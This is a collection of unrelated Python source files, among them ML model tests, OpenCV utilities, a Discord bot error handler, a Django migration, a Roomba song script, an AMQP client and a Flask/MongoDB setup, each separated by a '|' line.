$ prody blast MQIFVKTLTGKTITLEVEPSDTIENVKAKIQDKEGIPPDQQRLIFAGKQLEDGRTLSDYNIQ\
KESTLHLVLRLRGG
Blast search PDB for avidin structures, download files, and align all files \
onto the 2avi structure:
$ prody blast -d . ARKCSLTGKWTNDLGSNMTIGAVNSRGEFTGTYITAVTATSNEIKESPLHGTQNTIN\
KRTQPTFGFTVNWKFSESTTVFT
$ prody align 2avi.pdb *pdb """)
subparser.add_argument('-i', '--identity', dest='identity', type=float,
default=90.0, metavar='FLOAT',
help='percent sequence identity (default: %(default)s)')
subparser.add_argument('-o', '--overlap', dest='coverage', type=float,
default=90.0, metavar='FLOAT',
help='percent sequence overlap (default: %(default)s)')
subparser.add_argument('-d', '--dir', dest='folder', type=str,
default=None, metavar='PATH',
help=('download uncompressed PDB files to given path'))
subparser.add_argument('-z', '--gzip', dest='gzip', action='store_true',
default=False, help='write compressed PDB file')
subparser.add_argument('seq', type=str,
help=('sequence or file in fasta format'))
subparser.set_defaults(func=prody_blast)
subparser.set_defaults(subparser=subparser)
|
# Copyright 2021 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for PixelCNN Modules."""
import pixelcnn
from flax import linen as nn
from absl.testing import absltest
from absl.testing import parameterized
import numpy.testing as np_testing
from jax import random
import jax.numpy as np
from jax.config import config
class ModelTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.rng = random.PRNGKey(0)
self.x = np.arange(24).reshape(1, 4, 3, 2)
def get_weightnorm(self, params):
return [params[k] for k in ('direction', 'scale', 'bias')]
def assert_mean_and_variance(self, out):
# Weightnorm should ensure that, at initialization time, the outputs of the
# module have mean 0 and variance 1 over the non-feature dimensions.
np_testing.assert_allclose(np.mean(out, (0, 1, 2)), 0., atol=1e-5)
np_testing.assert_allclose(np.var(out, (0, 1, 2)), 1., atol=1e-5)
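  # For reference: weight normalisation reparameterises each kernel as
  # w = scale * direction / ||direction||, and the data-dependent init picks
  # scale and bias so the first forward pass is roughly standardised.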
def test_conv(self):
model = pixelcnn.ConvWeightNorm(features=4, kernel_size=(3, 2))
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 2, 2, 4))
self.assert_mean_and_variance(out)
def test_conv_down(self):
model = pixelcnn.ConvDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_down_right(self):
model = pixelcnn.ConvDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose(self):
model = pixelcnn.ConvTranspose(features=4, kernel_size = (3, 2))
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 6, 4, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose_down(self):
model = pixelcnn.ConvTransposeDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']["ConvWeightNorm_0"]["weightnorm_params"]
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_conv_transpose_down_right(self):
model = pixelcnn.ConvTransposeDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_pcnn_shape(self):
x = random.normal(self.rng, (2, 4, 4, 3))
model = pixelcnn.PixelCNNPP(depth=0, features=2, dropout_p=0)
out, _ = model.init_with_output(self.rng, x, train=False)
self.assertEqual(out.shape, (2, 4, 4, 100))
if __name__ == '__main__':
absltest.main()
|
#!/usr/bin/env python
import os
import sys
import unittest
DIR = os.path.dirname(os.path.abspath(__file__))
sys.path[0] = os.path.dirname(DIR)
from yorbay.lang import get_lang_chain
class TestLangChain(unittest.TestCase):
def test_get_lang_chain(self):
self.assertEqual(get_lang_chain('root'), ['root'])
self.assertEqual(get_lang_chain('en'), ['en', 'root'])
self.assertEqual(get_lang_chain('en_US'), ['en_US', 'en', 'root'])
self.assertEqual(get_lang_chain('en_US_POSIX'), ['en_US_POSIX', 'en_US', 'en', 'root'])
if __name__ == '__main__':
unittest.main()
|
from Functions.Featurespace import Classifier
from Functions.Featurespace import FeatureSpace
from Functions.Featurespace import find_annodir
import os
import cv2
import numpy as np
featurelist = FeatureSpace()
type_list = find_annodir()
# Run through all types
for types in type_list:
print(f"Importing {types}")
# Run through all subtypes
for category in os.listdir(types):
mask_path = os.listdir(f"{types}/{category}/rgbMasks")
# Get filenames
for images in mask_path:
# Load image
if images.endswith('.png'):
img = cv2.imread(f"{types}/{category}/rgbMasks/{images}", 0)
if img is not None and np.mean(img) > 0:
cnt, hir = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)[-2:]
for contours, hierarchy in zip(cnt, hir):
featurelist.create_features(contours, hierarchy, f"{types}_{category}")
if types == 'ROE':
print('Done import')
break
path = os.getcwd()
os.chdir(path.replace(r'\Annotations', ''))
classifier_path = 'classifier.pkl'
clf = Classifier()
clf.prepare_training_data(featurelist.get_features(), featurelist.type)
if os.path.exists(classifier_path):
clf.load_trained_classifier(classifier_path)
else:
clf.train_classifier()
clf.save_trained_classifier(classifier_path)
|
def simpleiterator():
yield 2
yield 4
yield 6
for element in simpleiterator():
print('iterator returned: %d' % element)
input("press enter to continue")
|
from discord.ext import commands
import traceback
import discord
errors = {
commands.MissingRequiredArgument: "{e.param} is a required argument.",
commands.BadArgument: "Invalid argument.",
commands.PrivateMessageOnly: "This command can only be used in private messages.",
commands.NoPrivateMessage: "This command can only be used in a server.",
commands.CommandNotFound: "This command does not exist.",
    commands.CommandOnCooldown: "Please wait another {e.retry_after:.0f} seconds before using this command again.",
    commands.MaxConcurrencyReached: "This command has reached its maximum number of concurrent uses.",
commands.NotOwner: "You must be the owner of this bot to use this command.",
commands.MemberNotFound: "A member named {e.argument} does not exist.",
commands.GuildNotFound: "A server named {e.argument} does not exist.",
commands.RoleNotFound: "A role named {e.argument} does not exist.",
commands.ChannelNotFound: "A channel named {e.argument} does not exist.",
commands.MessageNotFound: "A message named {e.argument} does not exist.",
commands.EmojiNotFound: "An emoji named {e.argument} does not exist.",
commands.MissingPermissions: "You don't have permission to use this command.",
commands.BotMissingPermissions: "I don't have permissions to execute this command.",
commands.MissingRole: "You don't have the required role to use this command.",
commands.MissingRole: "You don't have any of the required roles to use this command.",
commands.BotMissingRole: "I don't have the required role to execute this command.",
commands.BotMissingRole: "I don't have the required role to execute this command.",
commands.NSFWChannelRequired: "This command can only be used in an NSFW channel."
}
class ErrorHandler(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, exception: Exception):
embed = discord.Embed(color=self.bot.config["colors"]["error"])
embed.set_author(name="Error", icon_url=self.bot.config["icons"]["error"])
try:
embed.description = errors[type(exception)].format(e=exception)
except KeyError:
raise exception
else:
await ctx.reply(embed=embed)
def setup(bot):
bot.add_cog(ErrorHandler(bot))
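# Usage sketch (the extension path "cogs.errorhandler" is an assumed example):
# bot.load_extension("cogs.errorhandler")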
|
# Generated by Django 4.0.3 on 2022-04-07 11:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='first_name',
field=models.CharField(default='deneme', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='user',
name='last_name',
field=models.CharField(default='deneme', max_length=50),
preserve_default=False,
),
]
|
from __future__ import unicode_literals
import os
import random
import re
import subprocess
import sys
import time
import urllib
with open(sys.argv[1]) as input:
for line in input:
page = line.decode('utf-8').rstrip('\n')
page_quote = re.sub(r'\/', '%2F', urllib.quote(page.encode('utf-8')))
output_path = os.path.join(sys.argv[2], page_quote + '.txt')
if os.path.exists(output_path):
print "Page exists: " + output_path
continue
print "Trying to get: " + output_path
try:
subprocess.call('rm -r %s' % sys.argv[3], shell=True)
except OSError:
pass
try:
subprocess.call('rm %s' % sys.argv[3], shell=True)
except OSError:
pass
command = ('mediawiki-extensions-Collection-OfflineContentGenerator-bundler/bin/mw-ocg-bundler' +
' -o %s --prefix enwiki "%s"' % (sys.argv[3], page))
subprocess.call(command, shell=True)
command = ('mw-ocg-texter/bin/mw-ocg-texter -o "%s/%s.txt" %s' % (sys.argv[2], page_quote, sys.argv[3]))
subprocess.call(command, shell=True)
print "Attempt complete"
time.sleep(8 * random.random())
|
import os
import pandas as pd
from pandas.plotting import scatter_matrix
import matplotlib.pyplot as plt
from pathlib import Path
"""CONSTANTES (en mayuscula)"""
path = Path(__file__) # PATH A LA FILE EN CUALQUIER ORDENADOR
path2 = Path(path.parent) # Un directorio hacia atras
path3 = Path(path2.parent)
PATH4 = str(Path(path3.parent))
class CSVPlot():
def __init__(self, df):
self.df = df
def plot(self, grafico=4, columnas=[]):
        assert type(self.df) == pd.DataFrame, "Careful! Your input data must be a pandas DataFrame"
if columnas:
df = self.df[columnas]
else:
df = self.df
if grafico == 0:
self.plot_histograma(df)
elif grafico == 1:
self.plot_densidad(df)
elif grafico == 2:
self.plot_bigotes(df)
elif grafico == 3:
self.plot_correlacion(df)
elif grafico == 4:
self.plot_dispersion(df)
else:
pass
def plot_histograma(self, df, output=False):
df.hist()
if not output:
plt.show()
else:
plt.savefig(output)
def plot_densidad(self, df, output=False):
        df.plot(subplots=True, layout=(10, 4), sharex=False)  # kind="density" did not seem to work here
if not output:
plt.show()
else:
plt.savefig(output)
def plot_bigotes(self, df, output=False):
df.plot(kind='box', subplots=True, layout=(10, 4), sharex=False, sharey=False)
if not output:
plt.show()
else:
plt.savefig(output)
def plot_correlacion(self, df, output=False):
correlaciones = df.corr()
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(correlaciones, vmin=-1, vmax=1)
fig.colorbar(cax)
if not output:
plt.show()
else:
plt.savefig(output)
def plot_dispersion(self, df, output=False):
scatter_matrix(df)
if not output:
plt.show()
else:
plt.savefig(output)
    def guardar_plot(self, save=True):  # option to save the plot
columns = self.df.columns.values
for column in columns:
try:
self.df.hist(column=column)
if save:
my_file = f'data/{column}.png'
plt.savefig(os.path.join(PATH4, my_file))
else:
pass
            except ValueError:  # for non-numeric columns
pass
def borrar_plot(self):
columns = self.df.columns.values
for column in columns:
my_file = f'data/{column}.png'
try:
os.remove(os.path.join(PATH4, my_file))
except FileNotFoundError:
pass
"""Opcion a eliminar el plot"""
if __name__ == "__main__":
df = pd.read_csv("../../data/csv_barcelona.csv")
plot = CSVPlot(df)
plot.borrar_plot()
|
from __future__ import division
import numpy as np
import os
import pytest
from autoperiod import Autoperiod
from pytest import approx
from autoperiod.helpers import load_google_trends_csv, load_gpfs_csv
def data(name):
return os.path.join(os.path.dirname(__file__), "data", name)
def test_clean_sinwave():
times = np.arange(0, 10, 0.01)
values = np.sin(2 * np.pi * times)
period = Autoperiod(times, values).period
assert period == approx(1.0, abs=0.1)
@pytest.mark.parametrize(
"trange,freqscale",
[
(20, 2.0),
(20, 4.0),
(40, 2.0),
(40, 4.0)
]
)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_tight_sinwave(trange, freqscale, threshold_method):
times = np.arange(0, trange, 0.01)
values = np.sin(freqscale * np.pi * times)
period = Autoperiod(times, values, threshold_method=threshold_method).period
# TODO: increase precision
assert period == approx(2.0 / freqscale, abs=2e-2)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_squarewave(threshold_method):
# TODO: this case is very fragile
values = np.array([0, 0, 1, 1] * 10, np.float)
times = np.arange(0, values.size, dtype=np.float)
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == 4.0
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_trends_newyears(threshold_method):
times, values = load_google_trends_csv(data("trends_newyears.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
# within 3% of "expected" period
assert period == approx(365, rel=0.03)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_trends_easter(threshold_method):
times, values = load_google_trends_csv(data("trends_easter.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
# Easter isn't a fixed holiday, so the "expected" period won't be as close to 365 days
assert period == approx(365, rel=0.05)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_gpfs_reads(threshold_method):
times, values = load_gpfs_csv(data("ub-hpc-6665127-gpfs-reads.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == approx(9469, rel=0.01)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_gpfs_writes(threshold_method):
times, values = load_gpfs_csv(data("ub-hpc-6665127-gpfs-writes.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == approx(9560, rel=0.01)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_trends_python_nonperiodic(threshold_method):
times, values = load_google_trends_csv(data("trends_python.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period is None
@pytest.mark.parametrize("threshold_method", ['mc', 'stat'])
@pytest.mark.parametrize('filename,expect_period', [
('industry-2895978-gpfs-reads.csv', 180),
('industry-2896041-gpfs-writes.csv', 150)
])
def test_pcp_smallperiod(threshold_method, filename, expect_period):
# test for regression to false alarm large period
times, values = load_gpfs_csv(data(filename))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == approx(expect_period, rel=0.01)
@pytest.mark.parametrize("mthd", ['mc', 'stat'])
def test_pcp_spiky_acf(mthd):
times, values = load_gpfs_csv(data("chemistry-1455991-gpfs-writes.csv"))
period = Autoperiod(times, values, threshold_method=mthd).period
assert period == approx(3660, rel=0.01)
@pytest.mark.parametrize("threshold_method", ['mc', 'stat'])
@pytest.mark.parametrize('filename', [
'ub-hpc-writes-cpn-k16-25-01.csv',
])
def test_pcp_noperiod(threshold_method, filename):
times, values = load_gpfs_csv(data(filename))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period is None
|
from typing import List
import cv2
import numpy as np
import matplotlib.pyplot as plt
def get_color(idx) -> List[int]:
colors = [
(111, 74, 0),
(81, 0, 81),
(128, 64, 128),
(244, 35, 232),
(250, 170, 160),
(230, 150, 140),
(70, 70, 70),
(102, 102, 156),
(190, 153, 153),
(180, 165, 180),
(150, 100, 100),
(150, 120, 90),
(153, 153, 153),
(250, 170, 30),
(220, 220, 0),
(107, 142, 35),
(152, 251, 152),
(70, 130, 180),
(220, 20, 60),
(255, 0, 0),
(0, 0, 142),
(0, 0, 70),
(0, 60, 100),
(0, 0, 90),
(0, 0, 110),
(0, 80, 100),
(0, 0, 230),
(119, 11, 32),
(0, 0, 142),
]
color = colors[idx % len(colors)]
return color
def draw_bbox3d(image, bbox_vertices, color=(0, 200, 200), thickness=1):
for idx in range(bbox_vertices.shape[0] - 1):
v1 = (bbox_vertices[idx][0].item(), bbox_vertices[idx][1].item())
v2 = (bbox_vertices[idx + 1][0].item(), bbox_vertices[idx + 1][1].item())
image = cv2.line(image, v1, v2, color, thickness)
return image
def draw_line(image, v1, v2, color=(0, 200, 200), thickness=1) -> np.ndarray:
return cv2.line(image, v1, v2, color, thickness)
def draw_circle(
image, position, radius=5, color=(250, 100, 100), thickness=1, fill=True
) -> np.ndarray:
if fill:
thickness = -1
center = (int(position[0]), int(position[1]))
return cv2.circle(image, center, radius, color=color, thickness=thickness)
def draw_bbox2d(image, bbox2d, color=(0, 200, 200), thickness=1) -> np.ndarray:
v1 = (int(bbox2d[0].item()), int(bbox2d[1].item()))
v2 = (int(bbox2d[2].item()), int(bbox2d[3].item()))
return cv2.rectangle(image, v1, v2, color, thickness)
def draw_text(
image,
text,
position,
scale=0.4,
color=(0, 0, 0),
font=cv2.FONT_HERSHEY_SIMPLEX,
bg_color=(255, 255, 255),
blend=0.33,
lineType=1,
) -> np.ndarray:
position = [int(position[0]), int(position[1])]
if bg_color is not None:
text_size, _ = cv2.getTextSize(text, font, scale, lineType)
x_s = int(np.clip(position[0], a_min=0, a_max=image.shape[1]))
x_e = int(
np.clip(position[0] + text_size[0] - 1 + 4, a_min=0, a_max=image.shape[1])
)
y_s = int(
np.clip(position[1] - text_size[1] - 2, a_min=0, a_max=image.shape[0])
)
y_e = int(np.clip(position[1] + 1 - 2, a_min=0, a_max=image.shape[0]))
image[y_s : y_e + 1, x_s : x_e + 1, 0] = image[
y_s : y_e + 1, x_s : x_e + 1, 0
] * blend + bg_color[0] * (1 - blend)
image[y_s : y_e + 1, x_s : x_e + 1, 1] = image[
y_s : y_e + 1, x_s : x_e + 1, 1
] * blend + bg_color[1] * (1 - blend)
image[y_s : y_e + 1, x_s : x_e + 1, 2] = image[
y_s : y_e + 1, x_s : x_e + 1, 2
] * blend + bg_color[2] * (1 - blend)
position[0] = int(np.clip(position[0] + 2, a_min=0, a_max=image.shape[1]))
position[1] = int(np.clip(position[1] - 2, a_min=0, a_max=image.shape[0]))
return cv2.putText(image, text, tuple(position), font, scale, color, lineType)
def draw_attn(image, attn) -> np.ndarray:
attn = cv2.applyColorMap(attn[None], cv2.COLORMAP_JET)
return cv2.addWeighted(attn, 0.6, image, 0.3, 0)
def apply_mask(image, mask, color, alpha=0.5):
"""Apply the given mask to the image."""
for c in range(3):
image[:, :, c] = np.where(
mask == 1, image[:, :, c] * (1 - alpha) + alpha * color[c], image[:, :, c],
)
return image
def imshow(image, attn=None, figure_num=None) -> None:
if figure_num is not None:
plt.figure(figure_num)
else:
f, axs = plt.subplots(1, 1, figsize=(15, 15))
if len(image.shape) == 2:
image = np.tile(image, [3, 1, 1]).transpose([1, 2, 0])
plt.tick_params(labelbottom="off", labelleft="off")
plt.imshow(cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_RGB2BGR))
if attn is not None:
plt.imshow(attn, cmap=plt.cm.viridis, interpolation="nearest", alpha=0.9)
plt.show(block=False)
def imsave(file_name, image, figure_num=None) -> None:
if figure_num is not None:
plt.figure(figure_num)
else:
f, axs = plt.subplots(1, 1, figsize=(15, 15))
if len(image.shape) == 2:
image = np.tile(image, [3, 1, 1]).transpose([1, 2, 0])
plt.tick_params(labelbottom="off", labelleft="off")
plt.imsave(file_name, cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_RGB2BGR))
|
"""
Play namidaga kirari by spitz
"""
from time import sleep
from pyroombaadapter import PyRoombaAdapter
PORT = "/dev/ttyUSB0"
adapter = PyRoombaAdapter(PORT)
adapter.send_song_cmd(0, 10,
[66, 67, 69, 67, 66, 62, 64, 66, 67, 66],
[16, 16, 16, 32, 32, 16, 16, 16, 16, 64])
sleep(1.0)
adapter.send_song_cmd(1, 9,
[66, 67, 69, 67, 66, 71, 59, 62, 61],
[16, 16, 16, 32, 32, 32, 16, 16, 64])
sleep(1.0)
adapter.send_song_cmd(2, 13,
[62, 64, 61, 62, 64, 66, 62, 64, 66, 67, 64, 66, 71],
[16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16])
sleep(1.0)
adapter.send_song_cmd(3, 7,
[71, 67, 64, 62, 61, 62, 62],
[16, 16, 16, 16, 48, 16, 64])
sleep(3.0)
adapter.send_play_cmd(0)
sleep(4.0)
adapter.send_play_cmd(1)
sleep(4.0)
adapter.send_play_cmd(0)
sleep(4.0)
adapter.send_play_cmd(1)
sleep(4.0)
adapter.send_play_cmd(2)
sleep(4.0)
adapter.send_play_cmd(3)
sleep(4.0)
|
weapons_dict = {
1: { 'name': 'Grape', 'damage': 4, 'cost': 0},
2: { 'name': 'Strawberry', 'damage': 6, 'cost': 1000},
3: { 'name': 'Peach Slices', 'damage': 8, 'cost': 2000},
4: { 'name': 'Pizza', 'damage': 12, 'cost': 4000},
5: { 'name': 'Mixed Veggies', 'damage': 16, 'cost': 8000},
6: { 'name': 'Hamburger', 'damage': 24, 'cost': 10000},
7: { 'name': 'Fruit Cocktail', 'damage': 32, 'cost': 20000},
8: { 'name': 'Rotten Apple', 'damage': 40, 'cost': 40000},
9: { 'name': 'Mystery Meat', 'damage': 56, 'cost': 80000},
10: { 'name': 'Tomato', 'damage': 72, 'cost': 100000},
11: { 'name': 'Cottage Cheese', 'damage': 92, 'cost': 200000},
12: { 'name': 'Taco', 'damage': 112, 'cost': 400000},
13: { 'name': 'Milk', 'damage': 136, 'cost': 800000},
14: { 'name': 'Egg', 'damage': 166, 'cost': 1000000},
15: { 'name': 'Chocolate Milk', 'damage': 200, 'cost': 2000000},
16: { 'name': 'Salad', 'damage': 250, 'cost': 4000000},
17: { 'name': 'Chili', 'damage': 300, 'cost': 8000000},
18: { 'name': 'Nachos', 'damage': 400, 'cost': 10000000},
19: { 'name': 'Sloppy Joe', 'damage': 500, 'cost': 50000000},
20: { 'name': 'Cream Pie', 'damage': 750, 'cost': 100000000}
}
armor_dict = {
1: { 'name': 'T-Shirt', 'defense': 1, 'cost': 0},
2: { 'name': 'Work Shirt', 'defense': 2, 'cost': 1000},
3: { 'name': 'Polo Shirt', 'defense': 4, 'cost': 2000},
4: { 'name': 'Jogging Suit', 'defense': 8, 'cost': 4000},
5: { 'name': 'Sweater', 'defense': 12, 'cost': 8000},
6: { 'name': 'Poncho', 'defense': 16, 'cost': 10000},
7: { 'name': 'Windbreaker', 'defense': 24, 'cost': 20000},
8: { 'name': 'Cotton Jacket', 'defense': 32, 'cost': 40000},
9: { 'name': 'Wool Jacket', 'defense': 40, 'cost': 80000},
10: { 'name': 'Denim Jacket', 'defense': 56, 'cost': 100000},
11: { 'name': 'Saran Wrap', 'defense': 72, 'cost': 200000},
12: { 'name': 'Aluminum Foil', 'defense': 88, 'cost': 400000},
13: { 'name': 'Raincoat', 'defense': 102, 'cost': 800000},
14: { 'name': 'Tennis Racket', 'defense': 126, 'cost': 1000000},
15: { 'name': 'Plastic Tray', 'defense': 140, 'cost': 2000000},
16: { 'name': 'Trashcan Lid', 'defense': 170, 'cost': 4000000},
17: { 'name': 'Umbrella', 'defense': 200, 'cost': 8000000},
18: { 'name': 'Mirror', 'defense': 250, 'cost': 10000000},
19: { 'name': 'Pup Tent', 'defense': 300, 'cost': 50000000},
20: { 'name': 'Teacher Costume', 'defense': 400, 'cost': 100000000}
}
|
"""Constants for Dune HD integration."""
from __future__ import annotations
from typing import Final
ATTR_MANUFACTURER: Final = "Dune"
DOMAIN: Final = "dunehd"
DEFAULT_NAME: Final = "Dune HD"
|
from __future__ import print_function
from .conda_interface import get_index
import conda_build.config
#import conda_build_all.logging
import conda_build_all.version_matrix as vn_matrix
from conda_build_all.version_matrix import setup_vn_mtx_case
class ResolvedDistribution(object):
"""
    Represents a conda package, with the appropriate special case
versions fixed (e.g. CONDA_PY, CONDA_NPY). Without this, a meta
changes as the conda_build.config.CONDA_NPY changes.
Parameters
----------
    meta: conda_build.metadata.MetaData
The package which has been resolved.
special_versions: iterable
A list of the versions which have been resolved for this package.
e.g. ``(['python', '27'],)``
"""
def __init__(self, meta, special_versions=()):
self.meta = meta
self.special_versions = special_versions
def __repr__(self):
return 'ResolvedDistribution({}, {})'.format(self.meta,
self.special_versions)
def __str__(self):
return self.dist()
def vn_context(self, config=None):
return setup_vn_mtx_case(self.special_versions, config)
def __getattr__(self, name):
if hasattr(self.meta, 'config'):
config = setup_vn_mtx_case(self.special_versions,
config=self.meta.config)
self.meta.parse_again(config)
else:
with setup_vn_mtx_case(self.special_versions):
self.meta.parse_again()
result = getattr(self.meta, name)
# Wrap any callable such that it is called within the appropriate
# environment.
# callable exists in python 2.* and >=3.2
if callable(result):
orig_result = result
import functools
@functools.wraps(result)
def with_vn_mtx_setup(*args, **kwargs):
if hasattr(self.meta, 'config'):
config = setup_vn_mtx_case(self.special_versions,
config=self.meta.config)
self.meta.parse_again(config=config)
return orig_result(*args, **kwargs)
else:
with setup_vn_mtx_case(self.special_versions):
self.meta.parse_again()
return orig_result(*args, **kwargs)
result = with_vn_mtx_setup
return result
@classmethod
def resolve_all(cls, meta, index=None, extra_conditions=None):
"""
Given a package, return a list of ResolvedDistributions, one for each
possible (necessary) version permutation.
"""
if index is None:
with vn_matrix.override_conda_logging('WARN'):
index = get_index()
cases = sorted(vn_matrix.special_case_version_matrix(meta, index))
if extra_conditions:
cases = list(vn_matrix.filter_cases(cases, extra_conditions))
result = []
for case in cases:
dist = cls(meta, case)
if not dist.skip():
result.append(dist)
return result
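# Minimal usage sketch (a hedged illustration only: `meta` is assumed to be a
# conda_build MetaData object loaded elsewhere; the variable names below are
# not part of this module):
#
#   dists = ResolvedDistribution.resolve_all(meta)
#   for dist in dists:
#       print(dist.special_versions, dist.dist())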
|
import asyncio
from typing import *
import aio_pika
from twitterscraper.utils import Singleton
ConsumerCallback = Callable[[bytes], Awaitable[None]]
class AMQPClient(Singleton):
get: Callable[..., "AMQPClient"]
_connection: aio_pika.Connection
_channel: aio_pika.Channel
def __init__(self, uri: str):
self._uri = uri
self._exchanges = dict()
# noinspection PyTypeChecker
self._connection, self._channel = None, None
async def connect(self, loop: Optional[asyncio.AbstractEventLoop] = None):
print("AMQP Connecting...")
if loop is None:
loop = asyncio.get_event_loop()
self._connection = await aio_pika.robust_connection.connect_robust(self._uri, loop=loop)
self._channel = await self._connection.channel()
print("AMQP Connected")
async def get_exchange(self, exchange_name: str) -> aio_pika.Exchange:
# TODO implement locks for possible concurrent accesses
exchange = self._exchanges.get(exchange_name)
if exchange is not None:
return exchange
if not exchange_name:
exchange = self._channel.default_exchange
else:
# TODO not tested
exchange = await self._channel.get_exchange(exchange_name, ensure=True)
self._exchanges[exchange_name] = exchange
return exchange
async def enqueue(
self,
exchange: str,
routingkey: str,
persistent: bool,
payloads: List[Union[bytes, str]]
):
exchange = await self.get_exchange(exchange)
coroutines = list()
# TODO run in batches
# TODO wrap in AMQP transaction
for payload in payloads:
if isinstance(payload, str):
payload = payload.encode("utf-8")
message = aio_pika.Message(body=payload)
if persistent:
message.delivery_mode = aio_pika.DeliveryMode(aio_pika.DeliveryMode.PERSISTENT)
coroutines.append(exchange.publish(
message=message,
routing_key=routingkey
))
print(f"AMQP TX exchange={exchange} routingkey={routingkey} payload={payload}")
await asyncio.gather(*coroutines)
async def consume(self, queue: str, callback: ConsumerCallback, workers: int, msg_limit: Optional[int] = None):
"""Async blocking consume"""
print("Consuming", queue)
queue = await self._channel.get_queue(queue, ensure=True)
await self._channel.set_qos(prefetch_count=workers)
consumed_msgs = 0 if msg_limit is not None else None
async def _message_handler_task(message: aio_pika.IncomingMessage):
try:
print("AMQP RX", message.body)
await callback(message.body)
except Exception as ex:
print("AMQP RX Callback exception:", ex)
message.nack()
raise ex
else:
message.ack()
async with queue.iterator() as queue_iter:
async for _message in queue_iter:
if msg_limit is None:
# Worker execution mode
asyncio.create_task(_message_handler_task(_message))
else:
# Run-once execution mode
await _message_handler_task(_message)
consumed_msgs += 1
if consumed_msgs >= msg_limit:
break
async def close(self):
print("AMQP Closing...")
if self._channel:
await self._channel.close()
if self._connection:
await self._connection.close()
print("AMQP Closed")
|
from django.core.urlresolvers import reverse
from seahub.test_utils import BaseTestCase
class PasswordChangeTest(BaseTestCase):
def test_can_render(self):
self.login_as(self.user)
resp = self.client.get(reverse('auth_password_change'))
self.assertEqual(200, resp.status_code)
self.assertContains(resp, 'Password Modification')
def test_can_change(self):
self.login_as(self.user)
resp = self.client.post(
reverse('auth_password_change'), {
'old_password': self.user_password,
'new_password1': '123',
'new_password2': '123',
}
)
self.assertEqual(302, resp.status_code)
self.assertRedirects(resp, reverse('auth_password_change_done'))
|
from flask import Flask, request
from flask_restful import Resource, Api
from json import dumps
from flask_cors import CORS
import time
from pymongo import MongoClient
import os
import copy
# Create Flask RESTful api with CORS
app = Flask(__name__)
CORS(app)
api = Api(app)
# Load DB
client = MongoClient('mongodb://admin:{}@localhost:27017/yeet'.format(os.environ["YEET_DB_PASS"]))
db = client['yeet']
# Get expiration time (in seconds) from environ or default to 12 hours
if "YEET_DB_EXPIRE" in os.environ.keys():
expiration_seconds = int(os.environ["YEET_DB_EXPIRE"])
else:
expiration_seconds = 12 * 60 * 60
# Load collection and set expiration
collection = db['yeets']
try:
collection.drop_index("time_1")
except Exception:
pass  # the index may not exist yet (e.g. on a fresh database)
collection.ensure_index("time", expireAfterSeconds=expiration_seconds)
